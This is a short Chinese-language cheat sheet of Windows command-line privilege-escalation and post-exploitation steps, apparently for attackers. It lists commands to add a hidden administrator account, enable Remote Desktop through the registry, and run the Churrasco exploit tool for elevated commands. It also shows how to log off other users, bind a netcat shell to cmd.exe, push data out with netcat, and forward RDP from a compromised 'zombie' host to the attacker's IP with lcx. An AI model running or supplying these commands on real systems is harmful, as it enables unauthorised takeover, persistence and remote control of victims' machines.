CMD部分提权常用命令

ipconfig         显示本地IP地址

net start telnet           开telnet服务

net use z:127.0.0.1c$　　　　　映射对方的C盘 

net user　　　　　　　　　　　　查看所有用户列表

net user tnthk tnthk /add           添加用户tnthk密码为tnthk

net localgroup administrators tnthk /add   将帐号tnthk升级为管理员 

开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

巴西烤肉   Churrasco.exe "命令"

使用方法：

C:\RECYCLER\Chu.exe "net user tnthk tnthk /add && net localgroup administrators tnthk /add"

C:\RECYCLER\Chu.exe "net user admin$ /del"  删除帐号

query user  查看会话

logoff ID号  踢掉

C:\RECYCLER\Chu.exe "logoff 1"  

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

NC反弹

路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe

c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe

NC上传

DOS界面下运行:

NC -vv www.baidu.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

LCX端口转发

先本地监听51端口 lcx.exe -listen 51 3389

c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389

■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■